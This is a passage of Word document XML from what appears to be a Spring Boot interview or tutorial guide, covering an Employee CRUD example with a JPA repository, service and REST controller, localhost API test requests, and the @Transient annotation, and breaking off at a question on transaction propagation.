      </w:r>
    </w:p>
    <w:p w14:paraId="3D05FDDF" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E9365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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5A7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097E3CB0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEAD7E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A44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neratedValue(strategy = GenerationType.IDENTITY)  // Auto-generated value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3DC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1DDD1465" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="456439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30F87F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483FEA27" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5706AA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35D2F2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8A67BE4"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the JPA Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBC6B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Data JPA allows you to use repositories for CRUD operations. You don’t need to write any implementation code. Simply create an interface extending JpaRepository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6132980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ackage com.example.demo.repository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFECD3B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061453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54CDCA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data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6F7C9" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ECD7F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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63265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ustom query methods can be added here if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50316F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39A0A8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a Service Layer (Optional but recommended):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179279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service class to handle the business logic and interact with the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946D7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service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD76615" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B742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221DD9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repository.EmployeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E24AA0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0F9C458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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79235A13" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C43808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24A70ED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7F2213B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF1B25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rvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952BE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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765465ED" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED73DF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42720DB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Repository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C851A85" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09572F8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70C6B4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All();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A01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F421AA" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BC4AD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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F79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ById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929F0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F936F9" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBEE33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saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251ECED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save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F26B4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40AFDE0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BA6E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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2306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Repository.deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7CF1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35618F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AB91DA3"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Create the Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB300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fine a REST controller to expose the API endpoints and interact with the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025674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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8531B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429908C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03F194B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service.EmployeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E286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3E5DE04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272AD09" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7464FB8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61131C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5365119" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD1FB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359EF2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employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD948E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ublic class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDCC17" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091B34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73B9B11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Service employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CADD93" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A328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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085EE0C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AE237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AllEmployees();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13813A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FB7E9EF" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D965E4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7CAB853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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2244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EmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98B1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8DCCB72" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6975842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5C5B4DF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5CAE45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saveEmployee(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A758E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60AEB64" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF521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361D05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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273E90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rvice.deleteEmployee(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF98C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55891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47A614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Run the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F198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o run the application, you can use the following command in the terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30801E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E28BEF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the application starts, it will automatically connect to the database using the JPA/Hibernate configuration, and you can interact with it via the exposed REST API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33A077"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Test the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239FC3A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use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 xml:space="preserve"> to test the API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322CADE"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28CD8CA1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7098B821"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2DDCBA4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OST http://localhost:8080/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E426F8"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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7A965"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5EEA7576"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63A90DA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677E8F92"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n employee by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56B93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id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B6EE3"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68A9A519"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LETE http://localhost:8080/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2F977C"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6FD3540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By following these steps, you will be able to connect a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application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Spring Boot handles most of the heavy lifting for you, including configuration, entity mapping, and database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E923C" w14:textId="78730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514" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B78E1BF" w14:textId="12D45E25" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="00624897">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="591" w:name="_Toc197867805"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="00860857" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidR="00AC1FA9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ransient in spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00071C81" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:p w14:paraId="6C3C9FDD" w14:textId="1927AEB1" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A0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and Java in general), the @Transient annotation is used to mark a field in an entity that should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It indicates that the field should be ignored during the process of serializing an entity object to the database (when using JPA or Hibernate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDD0E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primarily used in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., classes that are mapped to database tables) to prevent certain fields from being saved in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED506D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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D733700"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It is used to mark a field or property in an entity that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not part of the database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should not be mapped to a column in the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0811C1E3"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might use @Transient when you have a calculated field, a non-persistent object, or any other field that should not be persisted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47CE8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9C9BE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2B9818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04F0BAE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Transient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DC4B8" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B09A2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01716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00C6ECCB" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A76D56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BE4B577"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4012899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6681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1C44E1B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19945119" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F7EC3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ransient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E0CC3"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int calculatedSalary; // This will not be saved in the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC8EAC" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EA43A9"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int getCalculatedSalary() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603288E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this.calculatedSalary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9FB74"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2F05135" w14:textId="77777777" w:rsidR="007E4A08" w:rsidRPr="00D774B4" w:rsidRDefault="007E4A08" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48681D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other getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A908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AC8A4C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6E653BAE"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alculatedSalary field will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because it is marked with @Transient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF6B90"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be used for temporary calculations or holding intermediate data that does not need to be stored in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE35C6"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When to Use @Transient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C21CB31"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have </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-persistent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields in your entity class (e.g., calculated fields or transient data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077CDD9D"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want to ensure that certain fields are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>excluded</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from persistence (to avoid writing unnecessary data to the database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F822F" w14:textId="090B93C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515" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED5E16" w14:textId="28983779" w:rsidR="00071C81" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3E93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="592" w:name="_Toc197867806"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the types of </w:t>
      </w:r>
      <w:r w:rsidR="009E36C2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">transaction </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>propagation?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="592"/>
    </w:p>
    <w:p w14:paraId="491DDFDC" w14:textId="69EE1D7C" w:rsidR="00910AE4" w:rsidRPr="00D774B4" w:rsidRDefault="00910AE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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
